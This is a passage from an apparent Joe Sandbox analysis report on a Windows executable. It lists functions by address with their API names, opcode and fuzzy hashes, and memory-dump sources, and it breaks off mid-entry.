                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3215553584-0
                                                                                                                    • Opcode ID: 5f4a90eb59d34f8a58853582a43e16d1c8b32088f69f0843c5a4c245a390bb8e
                                                                                                                    • Instruction ID: b6feebf5c5655ed2279b543038b1924ebb99d3096a8938a02f83f78f83c8efca
                                                                                                                    • Opcode Fuzzy Hash: 5f4a90eb59d34f8a58853582a43e16d1c8b32088f69f0843c5a4c245a390bb8e
                                                                                                                    • Instruction Fuzzy Hash: 4B017511A0A60741FD14BE6DA45137D91517FEFB74FA80630EF2E4A2FACD6CE82147A0
                                                                                                                    Function 00007FF7BB814970 Relevance: 1.5, APIs: 1, Instructions: 33COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3215553584-0
                                                                                                                    • Opcode ID: 2d4bb694f3344be1704f8fb2f3e9680fc63ca215821e8b9c9dcb21430b87e8c8
                                                                                                                    • Instruction ID: b259d7344734b5f9aa4d3278031597c8821cb3a7965427f845ba2e81d303dedc
                                                                                                                    • Opcode Fuzzy Hash: 2d4bb694f3344be1704f8fb2f3e9680fc63ca215821e8b9c9dcb21430b87e8c8
                                                                                                                    • Instruction Fuzzy Hash: E9F0BB21A0D10341E9147B6DB4412BDA2817FEA790FA85130FF5D862FECE6CD4618BB1
                                                                                                                    Function 00007FF7BB7E652C Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00007FF7BB814970: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7BB814999
                                                                                                                    • FreeLibrary.KERNEL32(?,?,?,00007FF7BB82C8FE), ref: 00007FF7BB7E656F
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FreeLibrary_invalid_parameter_noinfo
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3938577545-0
                                                                                                                    • Opcode ID: 1616f9817ac4f342c8a27cae0d88970e89b0e161c3324b28999c931e150df169
                                                                                                                    • Instruction ID: 9f74b25868535eb3d3fb3d321072d76fa64200113dcaae3e27220342280d9d13
                                                                                                                    • Opcode Fuzzy Hash: 1616f9817ac4f342c8a27cae0d88970e89b0e161c3324b28999c931e150df169
                                                                                                                    • Instruction Fuzzy Hash: 9AF03A52B09A0582EF19EFBDD0553386364BF69F08F640532DF0E4A1ADCF3CD4648261
                                                                                                                    Function 00007FF7BB804C68 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7BB804C5C
                                                                                                                      • Part of subcall function 00007FF7BB805600: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF7BB805609
                                                                                                                      • Part of subcall function 00007FF7BB805600: _CxxThrowException.LIBVCRUNTIME ref: 00007FF7BB80561A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Concurrency::cancel_current_taskExceptionThrowstd::bad_alloc::bad_alloc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1680350287-0
                                                                                                                    • Opcode ID: fcccb4986ec6b07b19f565cd1119bb6721087df1cc262ad93f02db05b15ececb
                                                                                                                    • Instruction ID: 78600ceebd4f6eade8ca8467451010c8b33d9c72915d44cd9aa2d23b451694cb
                                                                                                                    • Opcode Fuzzy Hash: fcccb4986ec6b07b19f565cd1119bb6721087df1cc262ad93f02db05b15ececb
                                                                                                                    • Instruction Fuzzy Hash: 72E09240E9A10745F968756D56461B982D02FBB3B1EEC1B30DF3D452EAAD2CA4B145B0
                                                                                                                    Function 00007FF7BB80DEF8 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CriticalDeleteSection
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 166494926-0
                                                                                                                    • Opcode ID: 1e503f39ac4771ab9e5c77a385804bbde878bde5e9aec211bf0958570055964e
                                                                                                                    • Instruction ID: ae8219b4858acc5dce9368134ca1faefd2635859781e713b8e79dc158ccd3f7d
                                                                                                                    • Opcode Fuzzy Hash: 1e503f39ac4771ab9e5c77a385804bbde878bde5e9aec211bf0958570055964e
                                                                                                                    • Instruction Fuzzy Hash: CCF01C65E09A0781FA00BF6DE8913B59391FFBAB45F800131DE5E4627A8E1CA4B483A1
                                                                                                                    Function 00007FF7BB85B334 Relevance: 1.5, APIs: 1, Instructions: 21fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileWrite
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3934441357-0
                                                                                                                    • Opcode ID: a0a1439e265e291f150910246ad1a366446c83d0ba354e2dc0beef75c9ab4ebe
                                                                                                                    • Instruction ID: 2db2aa1cbcee6df010a3c8386d131146835708f88385186884f4f3f1d7c07071
                                                                                                                    • Opcode Fuzzy Hash: a0a1439e265e291f150910246ad1a366446c83d0ba354e2dc0beef75c9ab4ebe
                                                                                                                    • Instruction Fuzzy Hash: 79E01C22608A9182D6109B1AF44436AE370F79ABC4F544525EF8C47B29CF7DD5618B80
                                                                                                                    Function 00007FF7BB7E3EB4 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: LongNamePath
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 82841172-0
                                                                                                                    • Opcode ID: 637964e6b351f452a28879436c201a5e99f96031ec26c8877a7972d1003a59f1
                                                                                                                    • Instruction ID: 878abdd045e26e270c4cf889fc821bbbf4da0d65a69a8fd5072b83c8df1b8151
                                                                                                                    • Opcode Fuzzy Hash: 637964e6b351f452a28879436c201a5e99f96031ec26c8877a7972d1003a59f1
                                                                                                                    • Instruction Fuzzy Hash: C9E09222B0874181DB21A76DE145398A3A5BF9C7C4F444031EE8C43B6ACD6CC5958A10
                                                                                                                    Function 00007FF7BB7E5D88 Relevance: 1.5, APIs: 1, Instructions: 19windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: IconNotifyShell_
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1144537725-0
                                                                                                                    • Opcode ID: 8549ef6000eb42c958f03a95ba6a5408167db34924d740ad0d6437c30ec5f920
                                                                                                                    • Instruction ID: 3baf8b89c60bd46b97ea41471afd8dc1af5d9dab4ede46a9d8a327dd64d31cd5
                                                                                                                    • Opcode Fuzzy Hash: 8549ef6000eb42c958f03a95ba6a5408167db34924d740ad0d6437c30ec5f920
                                                                                                                    • Instruction Fuzzy Hash: 89F082219197868BF765AB5CE444369B6A5FB96308FC4003ADB8D463ADCE3CD315CF90
                                                                                                                    Function 00007FF7BB7E1080 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Open_onexit
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3030063568-0
                                                                                                                    • Opcode ID: b140cdc24b49e8f2daa3c32c26d085363ec4fbb544eeb351244c2f0ff3a01b4f
                                                                                                                    • Instruction ID: e80ca454419eb6db7b059ab00a17d5a2d6c7eb268d58828f4b6118c8690eec60
                                                                                                                    • Opcode Fuzzy Hash: b140cdc24b49e8f2daa3c32c26d085363ec4fbb544eeb351244c2f0ff3a01b4f
                                                                                                                    • Instruction Fuzzy Hash: B8E0EC50F5A54F80EA04B76DA88507892A07F77346FD4563ACE0C8237ADE2CD2B587A1
                                                                                                                    Function 00007FF7BB7E10E8 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$CurrentVersionWow64_onexit
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2932345936-0
                                                                                                                    • Opcode ID: 03ad02108163b1b9c24d53c6048626981572e85475d5139af19f078af1ef234b
                                                                                                                    • Instruction ID: 019f1e0c1373f5520cb66d20e74cea044b128cd8cf15827d62033ebe07bca781
                                                                                                                    • Opcode Fuzzy Hash: 03ad02108163b1b9c24d53c6048626981572e85475d5139af19f078af1ef234b
                                                                                                                    • Instruction Fuzzy Hash: 91C00211EA944B81E61877BD48860B551E06FB7394FD40636DB0D812A6DD1C52FA47B1
                                                                                                                    Function 00007FF7BB7E1048 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _onexit
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 572287377-0
                                                                                                                    • Opcode ID: 773ed23fe7bc1dd7e8b75972c2a26041a0abafe16c5f42d1a8e6024edf34d541
                                                                                                                    • Instruction ID: c9fe7e360d639e39688921eb7d00d39b5e64f549defaa30c246090d596d29cad
                                                                                                                    • Opcode Fuzzy Hash: 773ed23fe7bc1dd7e8b75972c2a26041a0abafe16c5f42d1a8e6024edf34d541
                                                                                                                    • Instruction Fuzzy Hash: 09C00211E9944B81E51877BD4C8607541E06FBB351FD40676DB0D812B6DD1C52FA47E1
                                                                                                                    Function 00007FF7BB7E1064 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _onexit
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 572287377-0
                                                                                                                    • Opcode ID: 5447c473e94d7294484c99fc93f4d38cb7bf7a8a438e953c913b8a13f1fa59d2
                                                                                                                    • Instruction ID: 5733fbf7fea9c04e36a53928ce9c51a2436c7b2457deaadbe09022556ef2b3ea
                                                                                                                    • Opcode Fuzzy Hash: 5447c473e94d7294484c99fc93f4d38cb7bf7a8a438e953c913b8a13f1fa59d2
                                                                                                                    • Instruction Fuzzy Hash: 72C01201EAA04B80E50873BD4C8607841E02FBB300FD80236CA0D802BACD1C52F646B1
                                                                                                                    Function 00007FF7BB867E48 Relevance: 1.4, APIs: 1, Instructions: 163COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1452528299-0
                                                                                                                    • Opcode ID: b1ea28e244f60b4af54ff34aaaf102a183879d86c5d4002b95e89690f8712e5a
                                                                                                                    • Instruction ID: ede0462a3d4b6aabc26920a320b391481580296cb76893bcc014bd9818d5953e
                                                                                                                    • Opcode Fuzzy Hash: b1ea28e244f60b4af54ff34aaaf102a183879d86c5d4002b95e89690f8712e5a
                                                                                                                    • Instruction Fuzzy Hash: A9712922B04A4185EB10EF6DD4903ADA364BB6AB84F844532DF4E577BADF38E455C3A0
                                                                                                                    Function 00007FF7BB81DDA8 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocHeap
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4292702814-0
                                                                                                                    • Opcode ID: 56853fc6be513b26808fd6ceb43c2b1e56f5d2842f756231a7c5debb2bb5ead3
                                                                                                                    • Instruction ID: 05134c3efa0c0e50d285aa0431c87d3c8498f40a788bfdead88d5bffc1435a58
                                                                                                                    • Opcode Fuzzy Hash: 56853fc6be513b26808fd6ceb43c2b1e56f5d2842f756231a7c5debb2bb5ead3
                                                                                                                    • Instruction Fuzzy Hash: 56F04F44B0A20781FE54B66D94143B592927FFAB80FC85030CF0E862EDDD6CE46183B0
                                                                                                                    Function 00007FF7BB81C51C Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocHeap
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4292702814-0
                                                                                                                    • Opcode ID: d6cab95e1f74feff6e8dd6f9a30a9cf55c0df8872244003ab96fdfaeeafef6ec
                                                                                                                    • Instruction ID: 1cb36395194ff35d4fa21c4705c00d52c58f18585a37e16b1f64c2bffc09e62b
                                                                                                                    • Opcode Fuzzy Hash: d6cab95e1f74feff6e8dd6f9a30a9cf55c0df8872244003ab96fdfaeeafef6ec
                                                                                                                    • Instruction Fuzzy Hash: D7F0D051A0A24745FD54766E58012F9D1907FEABA0FC85630DE2E892E9ED9CE46089B0

                                                                                                                    Non-executed Functions

                                                                                                                    Function 00007FF7BB8756A0 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 476filecommemoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                    • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                    • API String ID: 2211948467-2373415609
                                                                                                                    • Opcode ID: 8e2f89096802004413711948fd726798781e069153c0ca8acc30819db0585273
                                                                                                                    • Instruction ID: 13465e8aaa1ff4bc8e27c92e38a26b14b0642eb976268d800623d23e72edebb8
                                                                                                                    • Opcode Fuzzy Hash: 8e2f89096802004413711948fd726798781e069153c0ca8acc30819db0585273
                                                                                                                    • Instruction Fuzzy Hash: 0322A032A086418AEB00EF2DE8585ADB7A0FB99B98F905135DF4E47B78CF3CE4558750
                                                                                                                    Function 00007FF7BB8917C0 Relevance: 70.6, APIs: 38, Strings: 2, Instructions: 587windowkeyboardCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
